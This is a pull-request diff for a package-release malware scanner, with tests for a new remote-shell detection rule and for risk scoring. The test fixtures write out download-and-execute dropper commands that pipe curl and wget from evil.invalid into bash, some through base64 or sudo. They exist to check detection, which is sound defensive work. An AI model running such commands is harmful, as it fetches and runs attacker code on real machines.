+  test("co-occurrence is a floor, not a ceiling", () => {
+    // The co-occurrence branch used to return a flat "high", which meant adding a
+    // second capability could *lower* a critical one. Escalation must never
+    // de-escalate.
+    expect(
+      computeRisk([code("code.remote-shell", "critical"), code("code.process-execution", "high")]),
+    ).toBe("critical");
+  });
+
   test("an obfuscated lone capability is not de-escalated", () => {
     // Assembling `child_process` from string fragments is itself a malice signal,
     // so a lone obfuscated process-execution keeps its severity.
@@ -2538,5 +2556,68 @@ describe("baseline finding fingerprints", () => {
       { previousFiles: previous, stagedFiles: staged },
     );
     expect(annotated[0]).toMatchObject({ diffStatus: "modified", releaseDelta: true });
+  });
+});
+
+describe("code.remote-shell release-delta classification", () => {
+  const manifest = { name: "p", version: "1.0.1", main: "index.js" };
+
+  test("a decoy shell token in an untouched line does not hide the added dropper", () => {
+    // Regression: `patternsForFinding` had no case for `code.remote-shell`, so
+    // the rule could only be release-delta when its recorded line happened to
+    // be a changed line — and the recorded line is the *first* match in the
+    // file. Any pre-existing `curl`/`wget`/`nc` token earlier in the file (a
+    // comment, a usage string) pinned it to an unchanged line and dropped the
+    // newly added dropper out of `releaseRisk`, which is what the workflow gate
+    // reads. The gate then recommended approve.
+    const previousFiles = [
+      {
+        path: "package.json",
+        size: 40,
+        sha256: "a",
+        flags: [],
+        textSample: JSON.stringify({ name: "p", version: "1.0.0", main: "index.js" }),
+      },
+      {
+        path: "index.js",
+        size: 60,
+        sha256: "b",
+        flags: [],
+        textSample: "// see: curl https://example.invalid/docs\nconst a = 1;\n",
+      },
+    ];
+    const stagedFiles = [
+      {
+        path: "package.json",
+        size: 40,
+        sha256: "c",
+        flags: [],
+        textSample: JSON.stringify(manifest),
+      },
+      {
+        path: "index.js",
+        size: 160,
+        sha256: "d",
+        flags: [],
+        textSample:
+          "// see: curl https://example.invalid/docs\nconst a = 1;\n" +
+          'require("child_process").execSync("wget http://evil.invalid/p -O /tmp/p && /tmp/p");\n',
+      },
+    ];
+
+    const diff = createPackageDiff(previousFiles, stagedFiles);
+    const annotated = annotateFindingsWithDiffStatus(
+      deterministicFindings(stagedFiles, diff, manifest),
+      diff,
+      { previousFiles, stagedFiles },
+    );
+
+    const remoteShell = annotated.find((finding) => finding.ruleId === "code.remote-shell");
+    expect(remoteShell).toBeDefined();
+    // The recorded line is still the decoy on line 1 — that is where the first
+    // pattern match is — but the finding is release delta because the rule's
+    // patterns also match the added line.
+    expect(remoteShell.releaseDelta).toBe(true);
+    expect(computeRisk(annotated.filter((finding) => finding.releaseDelta))).toBe("high");
   });
 });

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -2621,3 +2621,103 @@ describe("code.remote-shell release-delta classification", () => {
     expect(computeRisk(annotated.filter((finding) => finding.releaseDelta))).toBe("high");
   });
 });
+
+describe("code.remote-shell download-and-execute coverage", () => {
+  const manifest = { name: "p", version: "1.0.1", main: "index.js" };
+
+  function findingsFor(path, source) {
+    const stagedFiles = [
+      {
+        path: "package.json",
+        size: 40,
+        sha256: "c",
+        flags: [],
+        textSample: JSON.stringify(manifest),
+      },
+      { path, size: source.length, sha256: "d", flags: [], textSample: source },
+    ];
+    const diff = createPackageDiff([], stagedFiles);
+    return deterministicFindings(stagedFiles, diff, manifest).filter(
+      (finding) => finding.ruleId === "code.remote-shell",
+    );
+  }
+
+  // The download-and-execute regex used to require the interpreter token to sit
+  // immediately after the *first* pipe, so both the absolute-path form and any
+  // intermediate stage — `| base64 -d | bash` is the standard obfuscated
+  // dropper — fell back to the `high` tier that a bare shell tool earns.
+  test.each([
+    ["a bare interpreter", 'execSync("curl -s https://evil.invalid/p.sh | bash");'],
+    ["an absolute path", 'execSync("curl -s https://evil.invalid/p.sh | /bin/bash");'],
+    ["a base64 stage", 'execSync("curl -s https://evil.invalid/p | base64 -d | bash");'],
+    ["a decompression stage", 'execSync("curl -sL https://evil.invalid/p.gz | gunzip | sh");'],
+    ["a privilege prefix", 'execSync("curl -s https://evil.invalid/p.sh | sudo -E bash");'],
+    ["an env prefix", 'execSync("wget -qO- https://evil.invalid/p.sh | env sh");'],
+    ["a versioned interpreter", 'execSync("curl -s https://evil.invalid/p | python3.11 -");'],
+    ["backtick substitution", "execSync(`eval \\`curl -s https://evil.invalid/p\\``);"],
+  ])("pipes into %s at critical", (_label, command) => {
+    const findings = findingsFor("index.js", `require("child_process").${command}\n`);
+    expect(findings).toHaveLength(1);
+    expect(findings[0].severity).toBe("critical");
+  });
+
+  // The trailing word boundary is what separates an interpreter from a
+  // checksum tool; without it `| sha256sum` reads as `sh`.
+  test.each([
+    ["sha256sum", 'execSync("curl -s https://example.invalid/f | sha256sum");'],
+    ["shasum", 'execSync("curl -s https://example.invalid/f | shasum -a 256");'],
+  ])("does not read %s as an interpreter", (_label, command) => {
+    const findings = findingsFor("index.js", `require("child_process").${command}\n`);
+    expect(findings[0]?.severity).not.toBe("critical");
+  });
+
+  test("a curl mentioned only in comments does not raise a capability", () => {
+    // The executor requirement is satisfied by any spawn API in the same file,
+    // so a CLI that both shells out and documents its HTTP equivalent — the
+    // most common real shape — used to raise `high` on prose.
+    const findings = findingsFor(
+      "cli.js",
+      'import { execFileSync } from "node:child_process";\n' +
+        "// Equivalent to: curl -X POST https://api.example.invalid/v1/deploys\n" +
+        "/*\n * Or: wget -qO- https://api.example.invalid/v1/status\n */\n" +
+        'export const branch = () => execFileSync("git", ["rev-parse", "HEAD"]);\n',
+    );
+    expect(findings).toHaveLength(0);
+  });
+
+  test("a real command on a code line still raises a capability", () => {
+    const findings = findingsFor(
+      "cli.js",
+      'import { execSync } from "node:child_process";\n' +
+        "// Equivalent to: curl -X POST https://api.example.invalid/v1/deploys\n" +
+        'export const sync = () => execSync("curl -s https://api.example.invalid/v1/sync");\n',
+    );
+    expect(findings).toHaveLength(1);
+    expect(findings[0].severity).toBe("high");
+  });
+
+  // Build infrastructure runs on a CI runner at build time, never on a
+  // consumer's install, and every mainstream toolchain documents this idiom.
+  test.each([
+    ["Dockerfile", "RUN curl -fsSL https://deb.nodesource.com/setup_18.x | bash -\n"],
+    [".github/workflows/ci.yml", "      - run: curl -LsSf https://astral.sh/uv/install.sh | sh\n"],
+    ["Makefile", "bootstrap:\n\tcurl -sSL https://install.python-poetry.org | python3 -\n"],
+    ["docker/Dockerfile.alpine", "RUN wget -qO- https://example.invalid/install.sh | sh\n"],
+    [".circleci/config.yml", "      - run: curl -fsSL https://get.pnpm.io/install.sh | sh -\n"],
+  ])("does not fire on %s", (path, source) => {
+    expect(findingsFor(path, source)).toHaveLength(0);
+  });
+
+  test("build infrastructure that also spawns keeps the lower tier", () => {
+    // The exemption and the critical tier are withheld together: if something
+    // else in the file satisfies the executor requirement, the finding is still
+    // a bare shell-tool capability, not download-and-execute.
+    const findings = findingsFor(
+      "Dockerfile.build",
+      "RUN node -e \"require('child_process').execSync('echo hi')\"\n" +
+        "RUN curl -fsSL https://example.invalid/setup.sh | bash\n",
+    );
+    expect(findings).toHaveLength(1);
+    expect(findings[0].severity).toBe("high");
+  });
+});

--- a/test/reviewer-summary.test.ts
+++ b/test/reviewer-summary.test.ts
@@ -1,0 +1,51 @@
+import { describe, expect, test } from "vitest";
+import { reviewerSummaryVisible } from "../src/pages/Dashboard/ScanDetail/ReviewerSummary.tsx";
+import type { DisplayedAiResult } from "../server/lib/ai-review/types";
+
+// The AI narrative moved from the bottom-of-page "Reviewer notes" section to
+// `ReviewerSummary`, directly under the Recommendation. These assert the move
+// preserved the old section's visibility rule exactly — including the case that
+// matters most, where the reviewer was attempted and did not complete.
+describe("reviewerSummaryVisible", () => {
+  const complete: DisplayedAiResult = {
+    kind: "complete",
+    model: "@cf/moonshotai/kimi-k2.7-code",
+    summary: "Routine patch release.",
+    risk: "low",
+    releaseAssessment: "nothing_unusual",
+    findings: [],
+    requiresManualReview: false,
+  };
+
+  test("renders a completed review", () => {
+    expect(reviewerSummaryVisible(complete)).toBe(true);
+  });
+
+  test("renders an attempted-but-failed review", () => {
+    // Load-bearing: computeScanRisk floors this scan at medium, so the page must
+    // show that the reviewer was unavailable rather than silently omitting it.
+    expect(
+      reviewerSummaryVisible({
+        kind: "unavailable",
+        model: "@cf/moonshotai/kimi-k2.7-code",
+        summary: "AI review failed; deterministic findings remain available.",
+        status: "unavailable",
+      }),
+    ).toBe(true);
+  });
+
+  test("renders nothing when the reviewer is switched off (null model)", () => {
+    expect(
+      reviewerSummaryVisible({
+        kind: "unavailable",
+        model: null,
+        summary: "AI review is disabled.",
+        status: "unavailable",
+      }),
+    ).toBe(false);
+  });
+
+  test("renders nothing when there is no review at all", () => {
+    expect(reviewerSummaryVisible(null)).toBe(false);
+  });
+});

--- a/test/risk.test.mjs
+++ b/test/risk.test.mjs
@@ -210,3 +210,169 @@ describe("normalizeScanRiskBreakdown", () => {
     expect(result).toBe(null);
   });
 });
+
+describe("release memory as a risk input", () => {
+  // A tape-shaped release: the package's own machinery trips rules on files this
+  // release never touched, while the release delta is clean. These use an anchor
+  // rule (`file.native-artifact`) rather than a `code.*` capability so the
+  // assertions measure release memory and not the lone-capability
+  // de-escalation, which would report "low" either way.
+  const contextFinding = (ruleId, file) => ({
+    ruleId,
+    severity: "high",
+    file,
+    evidence: "e",
+    reason: "r",
+    releaseDelta: false,
+    diffStatus: "unchanged",
+  });
+  const deltaFinding = (ruleId, file) => ({
+    ruleId,
+    severity: "high",
+    file,
+    evidence: "e",
+    reason: "r",
+    releaseDelta: true,
+    diffStatus: "modified",
+  });
+  const consistency = (overrides = {}) => ({
+    status: "match",
+    priorScanId: "scan-prior",
+    priorVersion: "5.10.0",
+    decidedAt: "2026-07-01T00:00:00.000Z",
+    currentFindingCount: 2,
+    priorFindingCount: 2,
+    newFindingCount: 0,
+    newFindings: [],
+    ...overrides,
+  });
+
+  test("without release memory, package context still anchors the headline", () => {
+    const result = computeScanRiskBreakdown(
+      [contextFinding("file.native-artifact", "lib/cli.node")],
+      makeAiReview(),
+    );
+    expect(result.contextRisk).toBe("high");
+    expect(result.artifactRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(0);
+  });
+
+  test("a matching approved profile stops approved context re-anchoring the headline", () => {
+    const result = computeScanRiskBreakdown(
+      [contextFinding("file.native-artifact", "lib/cli.node")],
+      makeAiReview(),
+      consistency(),
+    );
+    expect(result.contextRisk).toBe("low");
+    expect(result.artifactRisk).toBe("low");
+    // The finding is still reported — only its scoring contribution is dropped.
+    expect(result.contextFindingCount).toBe(1);
+    expect(result.priorApprovedContextFindingCount).toBe(1);
+  });
+
+  test("release-delta findings are never demoted, so the gate cannot move", () => {
+    const result = computeScanRiskBreakdown(
+      [
+        contextFinding("file.native-artifact", "lib/cli.node"),
+        deltaFinding("install-script.lifecycle", "package.json"),
+      ],
+      makeAiReview(),
+      consistency(),
+    );
+    // `releaseRisk` is what workflow-gate-job.ts reads for its accept/reject
+    // recommendation. A prior approval must not be able to release a held job.
+    expect(result.releaseRisk).toBe("high");
+    expect(result.artifactRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(1);
+  });
+
+  test("diverged: only findings new since the approval keep scoring", () => {
+    const result = computeScanRiskBreakdown(
+      [
+        contextFinding("file.native-artifact", "lib/cli.node"),
+        contextFinding("file.secret-content", "lib/new.js"),
+      ],
+      makeAiReview(),
+      consistency({
+        status: "diverged",
+        newFindingCount: 1,
+        newFindings: [{ ruleId: "file.secret-content", severity: "high", file: "lib/new.js" }],
+      }),
+    );
+    expect(result.contextRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(1);
+  });
+
+  test("fails closed when the new-finding list was truncated by the cap", () => {
+    // newFindingCount > newFindings.length means the exact approved set can't be
+    // reconstructed. Demoting on a partial list could drop a real finding.
+    const result = computeScanRiskBreakdown(
+      [contextFinding("file.native-artifact", "lib/cli.node")],
+      makeAiReview(),
+      consistency({ status: "diverged", newFindingCount: 40, newFindings: [] }),
+    );
+    expect(result.contextRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(0);
+  });
+
+  test("fails closed when there is no prior approved scan", () => {
+    const result = computeScanRiskBreakdown(
+      [contextFinding("file.native-artifact", "lib/cli.node")],
+      makeAiReview(),
+      consistency({ status: "none", priorScanId: null }),
+    );
+    expect(result.contextRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(0);
+  });
+});
+
+describe("release memory never demotes AI findings", () => {
+  // The release-memory profile is built from deterministic rule findings only,
+  // so a "match" says nothing about what the AI reviewer found. An AI finding is
+  // projected without a ruleId; that is what keeps it out of the adjustment.
+  const aiContextFinding = () => ({
+    severity: "high",
+    file: "lib/vendor.js",
+    evidence: "e",
+    reason: "r",
+    releaseDelta: false,
+    diffStatus: "unchanged",
+  });
+  const matched = {
+    status: "match",
+    priorScanId: "scan-prior",
+    priorVersion: "1.0.0",
+    decidedAt: "2026-07-01T00:00:00.000Z",
+    currentFindingCount: 1,
+    priorFindingCount: 1,
+    newFindingCount: 0,
+    newFindings: [],
+  };
+
+  test("an AI context finding keeps scoring through a matching profile", () => {
+    const result = computeScanRiskBreakdown([aiContextFinding()], makeAiReview(), matched);
+    expect(result.contextRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(0);
+  });
+
+  test("a deterministic finding is dropped while the AI one beside it is not", () => {
+    const result = computeScanRiskBreakdown(
+      [
+        {
+          ruleId: "file.native-artifact",
+          severity: "high",
+          file: "lib/cli.node",
+          evidence: "e",
+          reason: "r",
+          releaseDelta: false,
+          diffStatus: "unchanged",
+        },
+        aiContextFinding(),
+      ],
+      makeAiReview(),
+      matched,
+    );
+    expect(result.priorApprovedContextFindingCount).toBe(1);
+    expect(result.contextRisk).toBe("high");
+  });
+});

--- a/test/risk.test.mjs
+++ b/test/risk.test.mjs
@@ -376,3 +376,47 @@ describe("release memory never demotes AI findings", () => {
     expect(result.contextRisk).toBe("high");
   });
 });
+
+describe("release memory and a skipped baseline", () => {
+  // When the published baseline exceeds the download budget the comparison is
+  // skipped and every finding is annotated `unknown` package context, so the
+  // whole scan lands in release memory's bucket. Discounting it on a profile
+  // match would grade an uncompared release as clean — the exact failure the
+  // skipped-baseline handling exists to prevent. The profile is
+  // (ruleId, severity, file); identical bytes are not implied.
+  const uncomparedFinding = (file) => ({
+    ruleId: "file.native-artifact",
+    severity: "high",
+    file,
+    evidence: "e",
+    reason: "r",
+    releaseDelta: false,
+    diffStatus: "unknown",
+  });
+  const matched = {
+    status: "match",
+    priorScanId: "scan-prior",
+    priorVersion: "1.0.0",
+    decidedAt: "2026-07-01T00:00:00.000Z",
+    currentFindingCount: 2,
+    priorFindingCount: 2,
+    newFindingCount: 0,
+    newFindings: [],
+  };
+  const findings = [uncomparedFinding("pkg/_c.pyd"), uncomparedFinding("pkg/_d.pyd")];
+
+  test("a matching profile does not discount an uncompared release", () => {
+    const result = computeScanRiskBreakdown(findings, makeAiReview(), matched, {
+      baselineComparisonSkipped: true,
+    });
+    expect(result.artifactRisk).toBe("high");
+    expect(result.contextRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(0);
+  });
+
+  test("the same scan with a real baseline still discounts", () => {
+    const result = computeScanRiskBreakdown(findings, makeAiReview(), matched);
+    expect(result.artifactRisk).toBe("low");
+    expect(result.priorApprovedContextFindingCount).toBe(2);
+  });
+});

--- a/test/risk.test.mjs
+++ b/test/risk.test.mjs
@@ -270,6 +270,46 @@ describe("release memory as a risk input", () => {
     expect(result.priorApprovedContextFindingCount).toBe(1);
   });
 
+  test.each([
+    ["install-script.preinstall"],
+    ["install-script.lifecycle"],
+    ["install-script.implicit-node-gyp"],
+    ["install-script.gyp-command-substitution"],
+    ["code.remote-shell"],
+    ["file.secret-content"],
+    ["tar.suspicious-entry"],
+  ])("an approval never discounts %s", (ruleId) => {
+    // The discount's premise is that a capability is a property of the package
+    // rather than the release. That does not extend to evidence of an active
+    // compromise: if a release shipping a dropper is ever approved (compromised
+    // account, or an approval predating the rule), the next README-only release
+    // must not report it as settled background. Without this carve-out the
+    // profile matches, the finding moves to context, and the headline reads low
+    // for every release thereafter.
+    const result = computeScanRiskBreakdown(
+      [contextFinding(ruleId, "lib/postinstall.js")],
+      makeAiReview(),
+      consistency(),
+    );
+    expect(result.contextRisk).toBe("high");
+    expect(result.artifactRisk).toBe("high");
+    expect(result.priorApprovedContextFindingCount).toBe(0);
+  });
+
+  test("standing-danger rules do not block the discount for the rest", () => {
+    const result = computeScanRiskBreakdown(
+      [
+        contextFinding("file.secret-content", "lib/.env"),
+        contextFinding("file.native-artifact", "lib/cli.node"),
+      ],
+      makeAiReview(),
+      consistency({ currentFindingCount: 3, priorFindingCount: 3 }),
+    );
+    // The native artifact is discounted; the embedded secret keeps scoring.
+    expect(result.priorApprovedContextFindingCount).toBe(1);
+    expect(result.contextRisk).toBe("high");
+  });
+
   test("release-delta findings are never demoted, so the gate cannot move", () => {
     const result = computeScanRiskBreakdown(
       [

--- a/test/scan-list-model.test.ts
+++ b/test/scan-list-model.test.ts
@@ -148,3 +148,134 @@ describe("scanMatchesDecisionFilter", () => {
     expect(scanMatchesDecisionFilter({ decision: "no_publish" }, "all")).toBe(true);
   });
 });
+
+describe("ScanListModel hasAnyScan", () => {
+  afterEach(() => {
+    model?.[Symbol.dispose]();
+    model = null;
+    vi.unstubAllGlobals();
+  });
+
+  function listResponse(scans: unknown[]) {
+    return jsonResponse({ scans, nextCursor: null });
+  }
+
+  test("a non-empty page settles the question without a second request", async () => {
+    const fetchMock = vi.fn(() => Promise.resolve(listResponse([scanDetail(null).scan])));
+    vi.stubGlobal("fetch", fetchMock);
+
+    model = new ScanListModel();
+    await model.refresh();
+
+    expect(model.hasAnyScan.value).toBe(true);
+    expect(fetchMock).toHaveBeenCalledTimes(1);
+  });
+
+  test("an empty undecided page probes 'all' before concluding", async () => {
+    // A maintainer who has decided every review looks identical to one who has
+    // never scanned, on the default filter. Only the second gets onboarding.
+    const fetchMock = vi
+      .fn()
+      .mockResolvedValueOnce(listResponse([]))
+      .mockResolvedValueOnce(listResponse([scanDetail("publish").scan]));
+    vi.stubGlobal("fetch", fetchMock);
+
+    model = new ScanListModel();
+    await model.refresh();
+
+    expect(model.hasAnyScan.value).toBe(true);
+    expect(fetchMock).toHaveBeenCalledTimes(2);
+    expect(String(fetchMock.mock.calls[1]?.[0])).toContain("filter=all");
+  });
+
+  test("concludes false only when the probe also comes back empty", async () => {
+    vi.stubGlobal(
+      "fetch",
+      vi.fn(() => Promise.resolve(listResponse([]))),
+    );
+
+    model = new ScanListModel();
+    await model.refresh();
+
+    expect(model.hasAnyScan.value).toBe(false);
+  });
+
+  test("does not carry a stale answer across an organization switch", async () => {
+    // Regression: `hasAnyScan` latched `true` on first resolution, so switching
+    // to a brand-new organization hid its getting-started panel. `refresh` runs
+    // on every switch, so it must re-resolve rather than keep the old answer.
+    const fetchMock = vi
+      .fn()
+      .mockResolvedValueOnce(listResponse([scanDetail(null).scan]))
+      .mockResolvedValueOnce(listResponse([]))
+      .mockResolvedValueOnce(listResponse([]));
+    vi.stubGlobal("fetch", fetchMock);
+
+    model = new ScanListModel();
+    await model.refresh();
+    expect(model.hasAnyScan.value).toBe(true);
+
+    await model.refresh(); // the switched-to organization
+    expect(model.hasAnyScan.value).toBe(false);
+  });
+
+  test("stays unknown when the probe fails, so nothing renders on a guess", async () => {
+    const fetchMock = vi
+      .fn()
+      .mockResolvedValueOnce(listResponse([]))
+      .mockRejectedValueOnce(new Error("network"));
+    vi.stubGlobal("fetch", fetchMock);
+
+    model = new ScanListModel();
+    await model.refresh();
+
+    expect(model.hasAnyScan.value).toBe(null);
+  });
+});
+
+describe("ScanListModel hasAnyScan after deletion", () => {
+  afterEach(() => {
+    model?.[Symbol.dispose]();
+    model = null;
+    vi.unstubAllGlobals();
+  });
+
+  test("deleting the only scan brings back the never-scanned state", async () => {
+    // Regression: `deleteFailed` emptied the list without touching
+    // `hasAnyScan`, so an organization whose single failed scan was deleted
+    // kept a stale `true` — the getting-started panel never returned and the
+    // empty state offered "Show all reviews" against an equally empty filter.
+    const fetchMock = vi
+      .fn()
+      .mockResolvedValueOnce(jsonResponse({ ok: true, id: "scan-1" }))
+      .mockResolvedValueOnce(jsonResponse({ scans: [], nextCursor: null }));
+    vi.stubGlobal("fetch", fetchMock);
+
+    model = new ScanListModel();
+    model.hasAnyScan.value = true;
+    model.scans.value = [{ ...scanDetail(null).scan, status: "failed" }];
+
+    await expect(model.deleteFailed("scan-1")).resolves.toBe(true);
+
+    expect(model.scans.value).toEqual([]);
+    expect(model.hasAnyScan.value).toBe(false);
+  });
+
+  test("deleting one of several scans leaves the answer alone", async () => {
+    const fetchMock = vi.fn(() => Promise.resolve(jsonResponse({ ok: true, id: "scan-1" })));
+    vi.stubGlobal("fetch", fetchMock);
+
+    model = new ScanListModel();
+    model.hasAnyScan.value = true;
+    model.scans.value = [
+      { ...scanDetail(null).scan, id: "scan-1", status: "failed" },
+      { ...scanDetail(null).scan, id: "scan-2" },
+    ];
+
+    await expect(model.deleteFailed("scan-1")).resolves.toBe(true);
+
+    expect(model.hasAnyScan.value).toBe(true);
+    // No probe: the list is still non-empty, so only the DELETE was sent.
+    expect(fetchMock).toHaveBeenCalledTimes(1);
+  });
+});

--- a/wrangler.jsonc
+++ b/wrangler.jsonc
@@ -21,6 +21,12 @@
 	"ai": {
 		"binding": "AI"
 	},
+	"analytics_engine_datasets": [
+		{
+			"binding": "PRODUCT_ANALYTICS",
+			"dataset": "drydock_product_events"
+		}
+	],
 	"flagship": [
 		{
 			"binding": "FLAGS",

--- a/wrangler.template.jsonc
+++ b/wrangler.template.jsonc
@@ -31,6 +31,16 @@
 	"ai": {
 		"binding": "AI"
 	},
+	// Optional: aggregate product counters (scan volume, latency, failure rate,
+	// AI-reviewer health, public-diff traffic). Writes no PII and nothing from
+	// the browser — see server/lib/analytics.ts. Remove this block to run
+	// without product analytics; every call site degrades to a no-op.
+	"analytics_engine_datasets": [
+		{
+			"binding": "PRODUCT_ANALYTICS",
+			"dataset": "drydock_product_events"
+		}
+	],
 	// Optional: wires the Cloudflare Flagship `ai-review` killswitch. With it
 	// present the AI reviewer is on by default per organization and can be
 	// switched off per org (or globally) via Flagship. Remove this block to

--- a/wrangler.template.jsonc
+++ b/wrangler.template.jsonc
@@ -33,7 +33,7 @@
 	},
 	// Optional: aggregate product counters (scan volume, latency, failure rate,
 	// AI-reviewer health, public-diff traffic). Writes no PII and nothing from
-	// the browser — see server/lib/analytics.ts. Remove this block to run
+	// the browser — see server/lib/platform/analytics.ts. Remove this block to run
 	// without product analytics; every call site degrades to a no-op.
 	"analytics_engine_datasets": [
 		{


### PR DESCRIPTION
## Summary

Three related changes, all traced back to reading production data.

**A shell-mediated dropper scored as `low`.** A release adding `execSync('curl … | bash')` tripped one `code.process-execution` — the weak-on-its-own capability — so the roll-up de-escalated the whole release and the workflow gate recommended approve. Neither network rule could see it: both model in-language APIs. New `code.remote-shell` rule (high; critical for download-and-execute), excluded from the weak-lone de-escalation. Rules `1.19.0`.

**The risk headline was miscalibrated.** Across production scans whose release delta was clean but whose package context read high, *every one* was published anyway — `scans.risk` is artifact risk, so unchanged package machinery drove a red banner on releases that changed nothing risky. Release memory now discounts context findings a maintainer already approved, bounded so it can never move `releaseRisk` or the gate.

**Measurement was gone.** Scan lifecycle events were removed from `scan_events` as noise (correctly, for the audit log) and pointed at Workers Logs — a short-retention debugging stream — so volume, latency, failure rate, and AI-reviewer health stopped being answerable. Seven Analytics Engine counters restore that, with no PII and nothing written from the browser.

Plus onboarding: under half of registered organizations have ever run a scan, and the path from "npm connected" to "first review" was unguided. New orgs now get a three-step panel ending at `/diff`.

## Bugs found by adversarial self-review

- `codeCapabilityRisk` returned a flat `"high"` for co-occurrence, so a second capability could *de-escalate* a critical one.
- `patternsForFinding` had no case for the new rule, so a decoy `curl` in an untouched comment pinned its line to an unchanged line and dropped the added dropper out of `releaseRisk` — the number the gate reads. Regression test added.
- `vscode.startup-remote-command`'s conjunction silently lost `curl` when it moved sets.
- Release memory initially dropped AI findings, which never enter the deterministic profile.
- `hasAnyScan` went stale across an org switch and after deleting the last scan.

## Test plan

- [x] `pnpm run verify` — lint, format, typecheck, 1,338 tests
- [x] `pnpm run test:e2e` — 16/16, including the credential-forwarding journal assertion
- [x] `pnpm run eval` — malicious recall 100% (34/34), critical 100%, benign FP 0/6 (hard-negatives 3 → 6)
- [x] Onboarding + scan detail verified in a browser against the fake-registry harness

Docs updated: `product-analytics.md` (new), `release-memory.md`, `security-detection-corpus.md`, `audit-log.md`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)